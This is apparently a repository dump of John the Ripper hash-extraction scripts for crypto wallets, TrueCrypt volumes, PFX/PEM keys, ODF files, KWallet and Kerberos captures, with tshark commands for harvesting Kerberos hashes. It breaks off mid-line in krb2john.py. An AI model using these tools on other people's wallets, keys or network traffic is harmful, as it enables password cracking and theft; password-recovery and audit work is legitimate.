├── README.md ├── blockchain2john.py ├── truecrypt2john.py ├── pfx2john.py ├── pem2john.py ├── ethereum2john.py ├── kwallet2john.py ├── odf2john.py ├── krb2john.py ├── electrum2john.py ├── Keylogger ├── bitcoin2john.py └── office2john.py /README.md: -------------------------------------------------------------------------------- 1 | # python 2 | various python scripts 3 | -------------------------------------------------------------------------------- /blockchain2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import sys 4 | import base64 5 | import binascii 6 | import argparse 7 | import json 8 | import traceback 9 | 10 | if __name__ == '__main__': 11 | 12 | parser = argparse.ArgumentParser( 13 | prog=sys.argv[0], 14 | usage="%(prog)s [blockchain wallet files]") 15 | 16 | parser.add_argument('--json', action='store_true', default=False, 17 | dest='json', help='is the wallet using v2 format?') 18 | parser.add_argument('--base64', action='store_true', default=False, 19 | dest='base64', help='does the wallet contain only a base64 string?') 20 | 21 | args, unknown = parser.parse_known_args() 22 | 23 | if len(sys.argv) < 2: 24 | parser.print_help() 25 | sys.exit(-1) 26 | 27 | for filename in unknown: 28 | with open(filename, "rb") as f: 29 | data = f.read() 30 | # try to detect the wallet format version, https://blockchain.info/wallet/wallet-format 31 | if b"guid" in data and args.json: # v1 32 | sys.stderr.write("My Wallet Version 1 seems to be used, remove --json option!\n") 33 | continue 34 | if b"pbkdf2_iterations" in data and not args.json: # v2/v3 35 | sys.stderr.write("My Wallet Version 2 or 3 seems to be used, adding --json option is required!\n") 36 | continue 37 | 38 | if args.json: 39 | # hack for version 2.0 and 3.0 wallets 40 | try: 41 | decoded_data = json.loads(data.decode("utf-8")) 42 | if "version" in decoded_data and (str(decoded_data["version"]) == "2" or str(decoded_data["version"]) == "3"): 43 | payload = base64.b64decode(decoded_data["payload"]) 44 | iterations = decoded_data["pbkdf2_iterations"] 45 | print("%s:$blockchain$v2$%s$%s$%s" % ( 46 | filename, iterations, len(payload), 47 | binascii.hexlify(payload).decode(("ascii")))) 48 | except: 49 | traceback.print_exc() 50 | pass 51 | 52 | if args.base64: 53 | # handle blockchain version 1 wallet format files which contain 54 | # only a base64 encoded string 55 | try: 56 | ddata = base64.decodestring(data) 57 | print("%s:$blockchain$%s$%s" % ( 58 | filename, len(ddata), 59 | binascii.hexlify(ddata).decode("ascii"))) 60 | except: 61 | pass 62 | 63 | if not (args.json or args.base64): # version 1 wallet format 64 | print("%s:$blockchain$%s$%s" % ( 65 | filename, len(data), 66 | binascii.hexlify(data).decode("ascii"))) 67 | -------------------------------------------------------------------------------- /truecrypt2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # TrueCrypt volume importion to a format usable by John The Ripper 4 | # 5 | # Written by Alain Espinosa in 2012. No copyright 6 | # is claimed, and the software is hereby placed in the public domain. 7 | # In case this attempt to disclaim copyright and place the software in the 8 | # public domain is deemed null and void, then the software is 9 | # Copyright (c) 2012 Alain Espinosa and it is hereby released to the 10 | # general public under the following terms: 11 | # 12 | # Redistribution and use in source and binary forms, with or without 13 | # modification, are permitted. 14 | # 15 | # There's ABSOLUTELY NO WARRANTY, express or implied. 16 | # 17 | # (This is a heavily cut-down "BSD license".) 18 | # 19 | # Ported to Python by Dhiru Kholia, in June of 2015 20 | 21 | import sys 22 | from os.path import basename 23 | import binascii 24 | import optparse 25 | 26 | 27 | def process_file(filename, keyfiles, options): 28 | try: 29 | f = open(filename, "rb") 30 | except Exception as e: 31 | sys.stderr.write("%s : No truecrypt volume found? %s\n" % str(e)) 32 | return 33 | 34 | header = f.read(512) # encrypted header of the volume 35 | if len(header) != 512: 36 | f.close() 37 | sys.stderr.write("%s : Truecrypt volume file to short: Need at least 512 bytes\n", filename) 38 | return 39 | 40 | if options.boot_mode: 41 | tags = ["truecrypt_RIPEMD_160_BOOT"] 42 | else: 43 | tags = ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"] 44 | 45 | for tag in tags: 46 | sys.stdout.write("%s:%s$" % (basename(filename), tag)) 47 | sys.stdout.write(binascii.hexlify(header)) 48 | if keyfiles: 49 | nkeyfiles = len(keyfiles) 50 | sys.stdout.write("$%d" % (nkeyfiles)) 51 | for keyfile in keyfiles: 52 | sys.stdout.write("$%s" % keyfile) 53 | sys.stdout.write(":normal::::%s\n" % filename) 54 | 55 | # try hidden volume if any 56 | f.seek(65536, 0) 57 | if f.tell() != 65536: 58 | f.close() 59 | return 60 | header = f.read(512) 61 | if len(header) != 512: 62 | f.close() 63 | return 64 | 65 | for tag in ["truecrypt_RIPEMD_160", "truecrypt_SHA_512", "truecrypt_WHIRLPOOL"]: 66 | sys.stdout.write("%s:%s$" % (basename(filename), tag)) 67 | sys.stdout.write(binascii.hexlify(header)) 68 | if keyfiles: 69 | nkeyfiles = len(keyfiles) 70 | sys.stdout.write("$%d" % (nkeyfiles)) 71 | for keyfile in keyfiles: 72 | sys.stdout.write("$%s" % keyfile) 73 | sys.stdout.write(":hidden::::%s\n" % filename) 74 | 75 | f.close() 76 | 77 | if __name__ == "__main__": 78 | if len(sys.argv) < 2: 79 | sys.stderr.write("Utility to import TrueCrypt volume to a format crackeable by John The Ripper\n") 80 | sys.stderr.write("\nUsage: %s [-b] volume_filename [keyfiles(s)]> output_file\n" % sys.argv[0]) 81 | sys.stderr.write("\nEnable -b only when attacking TrueCrypt's boot mode.\n") 82 | sys.stderr.write("\nError: No truecrypt volume file specified.\n") 83 | sys.exit(-1) 84 | 85 | parser = optparse.OptionParser() 86 | parser.add_option('-b', action="store_true", default=False, dest="boot_mode") 87 | options, remainder = parser.parse_args() 88 | 89 | keyfiles = [] 90 | if len(remainder) > 2: 91 | keyfiles = remainder[1:] 92 | 93 | process_file(remainder[0], keyfiles, options) 94 | -------------------------------------------------------------------------------- /pfx2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | 4 | """ 5 | Modified for JtR by Dhiru Kholia in July, 2016 6 | 7 | Copyright (c) 2015 Will Bond 8 | 9 | Permission is hereby granted, free of charge, to any person obtaining a copy of 10 | this software and associated documentation files (the "Software"), to deal in 11 | the Software without restriction, including without limitation the rights to 12 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 13 | of the Software, and to permit persons to whom the Software is furnished to do 14 | so, subject to the following conditions: 15 | 16 | The above copyright notice and this permission notice shall be included in all 17 | copies or substantial portions of the Software. 18 | 19 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 20 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 21 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 22 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 23 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 24 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 25 | SOFTWARE. 26 | """ 27 | 28 | import binascii 29 | import sys 30 | try: 31 | from asn1crypto import pkcs12 32 | except ImportError: 33 | sys.stderr.write("asn1crypto is missing, run 'pip install --user asn1crypto' to install it!\n") 34 | sys.exit(-1) 35 | import os 36 | 37 | 38 | def parse_pkcs12(filename): 39 | data = open(filename, "rb").read() 40 | pfx = pkcs12.Pfx.load(data) 41 | 42 | auth_safe = pfx['auth_safe'] 43 | if auth_safe['content_type'].native != 'data': 44 | raise ValueError( 45 | ''' 46 | Only password-protected PKCS12 files are currently supported 47 | ''' 48 | ) 49 | 50 | mac_data = pfx['mac_data'] 51 | if mac_data: 52 | mac_algo = mac_data['mac']['digest_algorithm']['algorithm'].native 53 | key_length = { 54 | 'sha1': 20, 55 | 'sha224': 28, 56 | 'sha256': 32, 57 | 'sha384': 48, 58 | 'sha512': 64, 59 | 'sha512_224': 28, 60 | 'sha512_256': 32, 61 | }[mac_algo] 62 | 63 | salt = mac_data['mac_salt'].native 64 | iterations = mac_data['iterations'].native 65 | mac_algo_numeric = -1 66 | if mac_algo == "sha1": 67 | mac_algo_numeric = 1 68 | elif mac_algo == "sha224": 69 | mac_algo_numeric = 224 70 | elif mac_algo == "sha256": 71 | mac_algo_numeric = 256 72 | elif mac_algo == "sha384": 73 | mac_algo_numeric = 384 74 | elif mac_algo == "sha512": 75 | mac_algo_numeric = 512 76 | else: 77 | sys.stderr.write("mac_algo %s is not supported yet!\n" % mac_algo) 78 | return 79 | stored_hmac = mac_data['mac']['digest'].native 80 | data = auth_safe['content'].contents 81 | size = len(salt) 82 | sys.stdout.write("%s:$pfxng$%s$%s$%s$%s$%s$%s$%s:::::%s\n" % 83 | (os.path.basename(filename), mac_algo_numeric, 84 | key_length, iterations, size, binascii.hexlify(salt), 85 | binascii.hexlify(data), 86 | binascii.hexlify(stored_hmac), filename)) 87 | 88 | 89 | if __name__ == "__main__": 90 | if len(sys.argv) < 2: 91 | sys.stderr.write("Usage: %s <.pfx file(s)>\n" % sys.argv[0]) 92 | 93 | for i in range(1, len(sys.argv)): 94 | parse_pkcs12(sys.argv[1]) 95 | -------------------------------------------------------------------------------- /pem2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding: utf-8 3 | 4 | # Copyright (C) 2015, Dhiru Kholia 5 | # 6 | # Shouldn't this be called pkcs8tojohn.py instead? 7 | 8 | import sys 9 | import traceback 10 | 11 | try: 12 | from asn1crypto import pem 13 | from asn1crypto.keys import EncryptedPrivateKeyInfo 14 | except ImportError: 15 | sys.stderr.write("asn1crypto python package is missing, please install it using 'pip install asn1crypto' command.\n") 16 | # traceback.print_exc() 17 | sys.exit(-1) 18 | 19 | """ 20 | 21 | https://www.ietf.org/rfc/rfc5208.txt 22 | 23 | http://lapo.it/asn1js/ 24 | 25 | https://github.com/bwall/pemcracker/blob/master/test.pem 26 | 27 | $ openssl asn1parse -in test.pem 28 | 0:d=0 hl=4 l= 710 cons: SEQUENCE 29 | 4:d=1 hl=2 l= 64 cons: SEQUENCE 30 | 6:d=2 hl=2 l= 9 prim: OBJECT :PBES2 31 | 17:d=2 hl=2 l= 51 cons: SEQUENCE 32 | 19:d=3 hl=2 l= 27 cons: SEQUENCE 33 | 21:d=4 hl=2 l= 9 prim: OBJECT :PBKDF2 34 | 32:d=4 hl=2 l= 14 cons: SEQUENCE 35 | 34:d=5 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:0C71E1C801194282 36 | 44:d=5 hl=2 l= 2 prim: INTEGER :0800 37 | 48:d=3 hl=2 l= 20 cons: SEQUENCE 38 | 50:d=4 hl=2 l= 8 prim: OBJECT :des-ede3-cbc 39 | 60:d=4 hl=2 l= 8 prim: OCTET STRING [HEX DUMP]:87120F8C098437D0 40 | 70:d=1 hl=4 l= 640 prim: OCTET STRING [HEX DUMP]:C4BC6BC5447BED58... 41 | """ 42 | 43 | 44 | def unwrap_pkcs8(blob): 45 | if not pem.detect(blob): 46 | return 47 | 48 | _, _, der_bytes = pem.unarmor(blob) 49 | data = EncryptedPrivateKeyInfo.load(der_bytes).native 50 | 51 | if "encryption_algorithm" not in data: 52 | return 53 | if "encrypted_data" not in data: 54 | return 55 | if "algorithm" not in data["encryption_algorithm"]: 56 | return 57 | if data["encryption_algorithm"]["algorithm"] != "pbes2": 58 | sys.stderr.write("[%s] encryption_algorithm <%s> is not supported currently!\n" % 59 | (sys.argv[0], data["encryption_algorithm"]["algorithm"])) 60 | return 61 | 62 | # encryption data 63 | encrypted_data = data["encrypted_data"] 64 | 65 | # KDF 66 | params = data["encryption_algorithm"]["parameters"] 67 | kdf = params["key_derivation_func"] 68 | if kdf["algorithm"] != "pbkdf2": 69 | sys.stderr.write("[%s] kdf algorithm <%s> is not supported currently!\n" % 70 | (sys.argv[0], kdf["algorithm"])) 71 | return 72 | kdf_params = kdf["parameters"] 73 | salt = kdf_params["salt"] 74 | iterations = kdf_params["iteration_count"] 75 | 76 | # Cipher 77 | cipher_params = params["encryption_scheme"] 78 | cipher = cipher_params["algorithm"] 79 | iv = cipher_params["parameters"] 80 | 81 | if cipher != "tripledes_3key": 82 | sys.stderr.write("[%s] cipher <%s> is not supported currently!\n" % (sys.argv[0], cipher)) 83 | return 84 | 85 | sys.stdout.write("$PEM$1$1$%s$%s$%s$%d$%s\n" % (salt.encode("hex"), iterations, iv.encode("hex"), len(encrypted_data), encrypted_data.encode("hex"))) 86 | 87 | 88 | if __name__ == "__main__": 89 | 90 | if len(sys.argv) < 2: 91 | sys.stdout.write("Usage: %s <.pem files using PCKS #8 format>\n" % 92 | sys.argv[0]) 93 | 94 | for filename in sys.argv[1:]: 95 | blob = open(filename, "rb").read() 96 | if b'-----BEGIN ENCRYPTED PRIVATE KEY-----' not in blob: 97 | if b'PRIVATE KEY-----' in blob: 98 | sys.stderr.write("[%s] try using sshng2john.py on this file instead!\n" % sys.argv[0]) 99 | else: 100 | sys.stderr.write("[%s] is this really a private key in PKCS #8 format?\n" % sys.argv[0]) 101 | 102 | continue 103 | 104 | unwrap_pkcs8(blob) 105 | -------------------------------------------------------------------------------- /ethereum2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2017, Dhiru Kholia 4 | # and it is hereby released to the general public under the following terms: 5 | # 6 | # Redistribution and use in source and binary forms, with or without 7 | # modification, are permitted. 8 | # 9 | # Special thanks goes to @Chick3nman for coming up with the output hash format. 10 | # 11 | # References, 12 | # 13 | # https://github.com/ethereum/wiki/wiki/Web3-Secret-Storage-Definition 14 | # 15 | # https://github.com/ethereum/go-ethereum/wiki/Passphrase-protected-key-store-spec, 16 | # v1 wallets are not supported (yet) 17 | 18 | import os 19 | import sys 20 | import traceback 21 | 22 | try: 23 | import json 24 | assert json 25 | except ImportError: 26 | try: 27 | sys.path.append(".") 28 | import simplejson as json 29 | except ImportError: 30 | sys.stderr.write("Please install json / simplejson module which is currently not installed.\n") 31 | sys.exit(-1) 32 | 33 | 34 | def process_presale_wallet(filename, data): 35 | try: 36 | bkp = data["bkp"] 37 | except KeyError: 38 | sys.stdout.write("%s: presale wallet is missing 'bkp' field, this is unsupported!\n" % filename) 39 | return 40 | 41 | try: 42 | encseed = data["encseed"] 43 | ethaddr = data["ethaddr"] 44 | except KeyError: 45 | sys.stdout.write("%s: presale wallet is missing necessary fields!\n" % filename) 46 | return 47 | 48 | # 16 bytes of bkp should be enough 49 | sys.stdout.write("%s:$ethereum$w*%s*%s*%s\n" % 50 | (os.path.basename(filename), encseed, ethaddr, bkp[:32])) 51 | 52 | 53 | def process_file(filename): 54 | try: 55 | f = open(filename, "rb") 56 | except IOError: 57 | e = sys.exc_info()[1] 58 | sys.stderr.write("%s\n" % str(e)) 59 | return 60 | 61 | data = f.read().decode("utf-8") 62 | try: 63 | data = json.loads(data) 64 | try: 65 | crypto = data["crypto"] 66 | except KeyError: 67 | try: 68 | crypto = data["Crypto"] 69 | except: # hack for presale wallet 70 | process_presale_wallet(filename, data) 71 | return 72 | cipher = crypto["cipher"] 73 | if cipher != "aes-128-ctr": 74 | sys.stdout.write("%s: unexpected cipher '%s' found\n" % (filename, cipher)) 75 | return -2 76 | kdf = crypto["kdf"] 77 | ciphertext = crypto["ciphertext"] 78 | mac = crypto["mac"] 79 | if kdf == "scrypt": 80 | kdfparams = crypto["kdfparams"] 81 | n = kdfparams["n"] 82 | r = kdfparams["r"] 83 | p = kdfparams["p"] 84 | salt = kdfparams["salt"] 85 | sys.stdout.write("%s:$ethereum$s*%s*%s*%s*%s*%s*%s\n" % 86 | (os.path.basename(filename), n, r, p, salt, 87 | ciphertext, mac)) 88 | elif kdf == "pbkdf2": 89 | kdfparams = crypto["kdfparams"] 90 | n = kdfparams["c"] 91 | prf = kdfparams["prf"] 92 | if prf != 'hmac-sha256': 93 | sys.stdout.write("%s: unexpected prf '%s' found\n" % (filename, prf)) 94 | return 95 | salt = kdfparams["salt"] 96 | sys.stdout.write("%s:$ethereum$p*%s*%s*%s*%s\n" % 97 | (os.path.basename(filename), n, salt, 98 | ciphertext, mac)) 99 | else: 100 | assert 0 101 | except: 102 | sys.stdout.write("%s: json parsing failed\n" % filename) 103 | traceback.print_exc() 104 | return -1 105 | 106 | f.close() 107 | 108 | 109 | if __name__ == "__main__": 110 | if len(sys.argv) < 2: 111 | sys.stderr.write("Usage: %s [Ethereum Wallet files (Geth/Mist/MyEtherWallet)]\n" % sys.argv[0]) 112 | sys.exit(-1) 113 | 114 | for j in range(1, len(sys.argv)): 115 | process_file(sys.argv[j]) 116 | -------------------------------------------------------------------------------- /kwallet2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # This software is Copyright (c) 2014, Sanju Kholia 4 | # and it is hereby released to the general public under the following terms: 5 | # 6 | # Redistribution and use in source and binary forms, with or without 7 | # modification, are permitted. 8 | # 9 | # "kde-runtime/kwalletd/backend/kwalletbackend.cc" file is authoritative. 10 | # 11 | # Use gdb -p `pidof kwalletd5` and "break gcry_kdf_derive" to debug this code. 12 | 13 | import sys 14 | import os 15 | import struct 16 | from binascii import hexlify 17 | 18 | KWMAGIC = "KWALLET\n\r\0\r\n" 19 | KWMAGIC_LEN = 12 20 | KWALLET_VERSION_MAJOR = 0 21 | KWALLET_VERSION_MINOR = 0 22 | KWALLET_CIPHER_BLOWFISH_ECB = 0 # this was the old KWALLET_CIPHER_BLOWFISH_CBC 23 | KWALLET_CIPHER_3DES_CBC = 1 24 | KWALLET_CIPHER_GPG = 2 25 | KWALLET_CIPHER_BLOWFISH_CBC = 3 26 | KWALLET_HASH_SHA1 = 0 27 | KWALLET_HASH_MD5 = 1 # unsupported (even upstream) 28 | KWALLET_HASH_PBKDF2_SHA512 = 2 # used when using kwallet with pam or since 4.13 version 29 | N = 128 30 | 31 | PBKDF2_SHA512_KEYSIZE = 56 32 | PBKDF2_SHA512_SALTSIZE = 56 33 | PBKDF2_SHA512_ITERATIONS = 50000 34 | 35 | 36 | def process_file(filename): 37 | offset = 0 38 | new_version = False # PBKDF2-HMAC-SHA512 if True 39 | kwallet_minor_version = -1 40 | 41 | try: 42 | fd = open(filename, "rb") 43 | except IOError: 44 | e = sys.exc_info()[1] 45 | sys.stderr.write("%s\n" % str(e)) 46 | return 47 | 48 | # TOCTOU but who cares, right? ;) 49 | size = os.stat(filename).st_size 50 | buf = fd.read(KWMAGIC_LEN) 51 | 52 | if buf != KWMAGIC: 53 | sys.stderr.write("%s : Not a KDE KWallet file!\n" % filename) 54 | return 55 | offset += KWMAGIC_LEN 56 | buf = bytearray(fd.read(4)) 57 | offset += 4 58 | 59 | # First byte is major version, second byte is minor version 60 | if buf[0] != KWALLET_VERSION_MAJOR: 61 | sys.stderr.write("%s : Unknown major version!\n" % filename) 62 | return 63 | # 0 has been the MINOR version until 4.13, from that point we use it to 64 | # upgrade the hash 65 | # 66 | # See runtime/kwalletd/backend/backendpersisthandler.cpp for details 67 | if buf[1] != 0: # Old KWALLET_VERSION_MINOR 68 | if buf[1] != 1: # New KWALLET_VERSION_MINOR 69 | sys.stderr.write("%s : Unknown minor version!\n" % filename) 70 | return 71 | new_version = True 72 | kwallet_minor_version = buf[1] 73 | if buf[2] != KWALLET_CIPHER_BLOWFISH_ECB and buf[2] != KWALLET_CIPHER_BLOWFISH_CBC: 74 | sys.stderr.write("%s : Unsupported cipher <%d>\n" % (filename, buf[2])) 75 | return 76 | if buf[3] != KWALLET_HASH_SHA1 and buf[3] != KWALLET_HASH_PBKDF2_SHA512: 77 | sys.stderr.write("%s : Unsupported hash <%d>\n" % (filename, buf[3])) 78 | return 79 | 80 | # Read in the hashes 81 | buf = fd.read(4) 82 | n = struct.unpack("> I", buf)[0] 83 | if n > 0xffff: 84 | sys.stderr.write("%s : sanity check failed!\n" % filename) 85 | sys.exit(6) 86 | offset += 4 87 | for i in range(0, n): 88 | buf = fd.read(16) 89 | offset += 16 90 | buf = fd.read(4) # read 4 bytes more 91 | fsz = struct.unpack("> I", buf)[0] 92 | offset += 4 93 | for j in range(0, fsz): 94 | fd.read(16) 95 | offset += 16 96 | 97 | # Read in the rest of the file 98 | encrypted_size = size - offset 99 | encrypted = fd.read(encrypted_size) 100 | encrypted_size = len(encrypted) 101 | 102 | if encrypted_size % 8 != 0: 103 | sys.stderr.write("%s : invalid file structure!\n", filename) 104 | sys.exit(7) 105 | 106 | if new_version: 107 | # read salt 108 | salt_filename = os.path.splitext(filename)[0] + ".salt" 109 | try: 110 | salt = open(salt_filename).read() 111 | except: 112 | sys.stderr.write("%s : unable to read salt from %s\n" % (filename, salt_filename)) 113 | sys.exit(8) 114 | salt_len = len(salt) 115 | iterations = PBKDF2_SHA512_ITERATIONS # is this fixed? 116 | sys.stdout.write("%s:$kwallet$%ld$%s$%d$%d$%s$%s" % 117 | (os.path.basename(filename), encrypted_size, 118 | hexlify(encrypted), kwallet_minor_version, salt_len, 119 | salt.encode("hex"), iterations)) 120 | sys.stdout.write(":::::%s\n" % filename) 121 | else: 122 | sys.stdout.write("%s:$kwallet$%ld$%s" % (os.path.basename(filename), encrypted_size, hexlify(encrypted))) 123 | sys.stdout.write(":::::%s\n" % filename) 124 | 125 | fd.close() 126 | 127 | if __name__ == "__main__": 128 | if len(sys.argv) < 2: 129 | sys.stderr.write("Usage: %s <.kwl file(s)>\n" % sys.argv[0]) 130 | sys.exit(-1) 131 | 132 | for i in range(1, len(sys.argv)): 133 | process_file(sys.argv[i]) 134 | -------------------------------------------------------------------------------- /odf2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """odf2john.py processes ODF files into a format suitable 4 | for use with JtR. 5 | 6 | Output Format: 7 | 8 | filename:$odf*cipher type*checksum type*iterations*key-size*checksum* 9 | iv length*iv*salt length*salt*inline or not*content.xml or its path""" 10 | 11 | from xml.etree.ElementTree import ElementTree 12 | import zipfile 13 | import sys 14 | import base64 15 | import binascii 16 | import os 17 | 18 | 19 | def process_file(filename): 20 | try: 21 | zf = zipfile.ZipFile(filename) 22 | except zipfile.BadZipfile: 23 | sys.stderr.write("%s is not an OpenOffice file!\n" % filename) 24 | return 2 25 | try: 26 | mf = zf.open("META-INF/manifest.xml") 27 | except KeyError: 28 | sys.stderr.write("%s is not an OpenOffice file!\n" % filename) 29 | return 3 30 | tree = ElementTree() 31 | tree.parse(mf) 32 | r = tree.getroot() 33 | 34 | # getiterator() is deprecated but 2.6 does not have iter() 35 | try: 36 | elements = list(r.iter()) 37 | except: 38 | elements = list(r.getiterator()) 39 | 40 | is_encrypted = False 41 | key_size = 16 42 | for i in range(0, len(elements)): 43 | element = elements[i] 44 | if element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}full-path") == "content.xml": 45 | for j in range(i + 1, i + 1 + 3): 46 | element = elements[j] 47 | # print element.items() 48 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}checksum") 49 | if data: 50 | is_encrypted = True 51 | checksum = data 52 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}checksum-type") 53 | if data: 54 | checksum_type = data 55 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}initialisation-vector") 56 | if data: 57 | iv = data 58 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}salt") 59 | if data: 60 | salt = data 61 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}algorithm-name") 62 | if data: 63 | algorithm_name = data 64 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}iteration-count") 65 | if data: 66 | iteration_count = data 67 | data = element.get("{urn:oasis:names:tc:opendocument:xmlns:manifest:1.0}key-size") 68 | if data: 69 | key_size = data 70 | 71 | if not is_encrypted: 72 | sys.stderr.write("%s is not an encrypted OpenOffice file!\n" % filename) 73 | return 4 74 | 75 | checksum = base64.decodestring(checksum.encode()) 76 | checksum = binascii.hexlify(checksum).decode("ascii") 77 | iv = binascii.hexlify(base64.decodestring(iv.encode())).decode("ascii") 78 | salt = binascii.hexlify(base64.decodestring(salt.encode())).decode("ascii") 79 | 80 | try: 81 | content = zf.open("content.xml").read(1024) 82 | except KeyError: 83 | sys.stderr.write("%s is not an encrypted OpenOffice file, " \ 84 | "content.xml missing!\n" % filename) 85 | return 5 86 | 87 | if algorithm_name.find("Blowfish CFB") > -1: 88 | algorithm_type = 0 89 | elif algorithm_name.find("aes256-cbc") > -1: 90 | algorithm_type = 1 91 | else: 92 | sys.stderr.write("%s uses un-supported encryption!\n" % filename) 93 | return 6 94 | 95 | if checksum_type.upper().find("SHA1") > -1: 96 | checksum_type = 0 97 | elif checksum_type.upper().find("SHA256") > -1: 98 | checksum_type = 1 99 | else: 100 | sys.stderr.write("%s uses un-supported checksum algorithm!\n" % \ 101 | filename) 102 | return 7 103 | 104 | meta_data_available = True 105 | gecos = "" 106 | try: 107 | meta = zf.open("meta.xml") 108 | meta_tree = ElementTree() 109 | meta_tree.parse(meta) 110 | meta_r = meta_tree.getroot() 111 | for office_meta in meta_r: 112 | for child in office_meta: 113 | if "subject" in child.tag: 114 | gecos += child.text 115 | elif "keyword" in child.tag: 116 | gecos += child.text 117 | elif "title" in child.tag: 118 | gecos += child.text 119 | elif "description" in child.tag: 120 | gecos += child.text 121 | gecos = gecos.replace("\n","").replace("\r","").replace(":","") 122 | except: 123 | meta_data_available = False 124 | 125 | if meta_data_available: 126 | sys.stdout.write("%s:$odf$*%s*%s*%s*%s*%s*%d*%s*%d*%s*%d*%s:::%s::%s\n" % \ 127 | (os.path.basename(filename), algorithm_type, checksum_type, 128 | iteration_count, key_size, checksum, len(iv) / 2, iv, 129 | len(salt) / 2, salt, 0, binascii.hexlify(content).decode("ascii"), 130 | gecos, filename)) 131 | else: 132 | sys.stdout.write("%s:$odf$*%s*%s*%s*%s*%s*%d*%s*%d*%s*%d*%s:::::%s\n" % \ 133 | (os.path.basename(filename), algorithm_type, checksum_type, 134 | iteration_count, key_size, checksum, len(iv) / 2, iv, 135 | len(salt) / 2, salt, 0, binascii.hexlify(content).decode("ascii"), 136 | filename)) 137 | 138 | if __name__ == "__main__": 139 | if len(sys.argv) < 2: 140 | sys.stderr.write("Usage: %s \n" % sys.argv[0]) 141 | sys.exit(-1) 142 | 143 | for k in range(1, len(sys.argv)): 144 | process_file(sys.argv[k]) 145 | -------------------------------------------------------------------------------- /krb2john.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | # This file was named krbpa2john.py previously. 4 | # 5 | # http://anonsvn.wireshark.org/wireshark/trunk/doc/README.xml-output 6 | # 7 | # For extracting "AS-REQ (krb-as-req)" hashes, 8 | # tshark -r AD-capture-2.pcapng -T pdml > data.pdml 9 | # tshark -2 -r test.pcap -R "tcp.dstport==88 or udp.dstport==88" -T pdml >> data.pdml 10 | # ./run/krb2john.py data.pdml 11 | # 12 | # For extracting "TGS-REP (krb-tgs-rep)" hashes, 13 | # tshark -2 -r test.pcap -R "tcp.srcport==88 or udp.srcport==88" -T pdml >> data.pdml 14 | # ./run/krb2john.py data.pdml 15 | # 16 | # Tested on Ubuntu 14.04.2 LTS (Trusty Tahr), and Fedora 25. 17 | # 18 | # $ tshark -v 19 | # TShark 1.10.6 (v1.10.6 from master-1.10) 20 | # 21 | # August 2017 update -> Extracts AS-REP hashes too. Crack such hashes with 22 | # krb5asrep format. 23 | # 24 | # October 2017 update -> Extracts TGS-REP hashes too. Crack such hashes with 25 | # krb5tgs format. 26 | 27 | 28 | import sys 29 | try: 30 | from lxml import etree 31 | except ImportError: 32 | sys.stderr.write("This program needs lxml libraries to run. Please install the python-lxml package.\n") 33 | sys.exit(1) 34 | import binascii 35 | 36 | 37 | def process_file(f): 38 | 39 | xmlData = etree.parse(f) 40 | 41 | messages = [e for e in xmlData.xpath('/pdml/packet/proto[@name="kerberos"]')] 42 | PA_DATA_ENC_TIMESTAMP = None 43 | etype = None 44 | user = '' 45 | salt = '' 46 | realm = None 47 | 48 | for msg in messages: # msg is of type "proto" 49 | r = msg.xpath('.//field[@name="kerberos.msg_type"]') or msg.xpath('.//field[@name="kerberos.msg.type"]') 50 | if not r: 51 | continue 52 | if isinstance(r, list): 53 | r = r[0] 54 | message_type = r.attrib["show"] 55 | 56 | # "kerberos.etype_info2.salt" value (salt) needs to be extracted 57 | # from a different packet when etype is 17 or 18! 58 | # if salt is empty, realm.user is used instead (in krb5pa-sha1_fmt_plug.c) 59 | if message_type == "30": # KRB-ERROR 60 | r = msg.xpath('.//field[@name="kerberos.etype_info2.salt"]') or msg.xpath('.//field[@name="kerberos.salt"]') or msg.xpath('.//field[@name="kerberos.etype_info.salt"]') 61 | if r: 62 | if isinstance(r, list): 63 | # some of the entries might have "value" missing! 64 | for item in r: 65 | if "value" in item.attrib: 66 | try: 67 | salt = binascii.unhexlify(item.attrib["value"]) 68 | break 69 | except: 70 | continue 71 | 72 | if message_type == "10": # Kerberos AS-REQ 73 | # locate encrypted timestamp 74 | r = msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.PA_ENC_TIMESTAMP.encrypted"]') or msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.cipher"]') 75 | if not r: 76 | continue 77 | if isinstance(r, list): 78 | r = r[0] 79 | PA_DATA_ENC_TIMESTAMP = r.attrib["value"] 80 | 81 | # locate etype 82 | r = msg.xpath('.//field[@name="kerberos.padata"]//field[@name="kerberos.etype"]') 83 | if not r: 84 | continue 85 | if isinstance(r, list): 86 | r = r[0] 87 | etype = r.attrib["show"] 88 | 89 | # locate realm 90 | r = 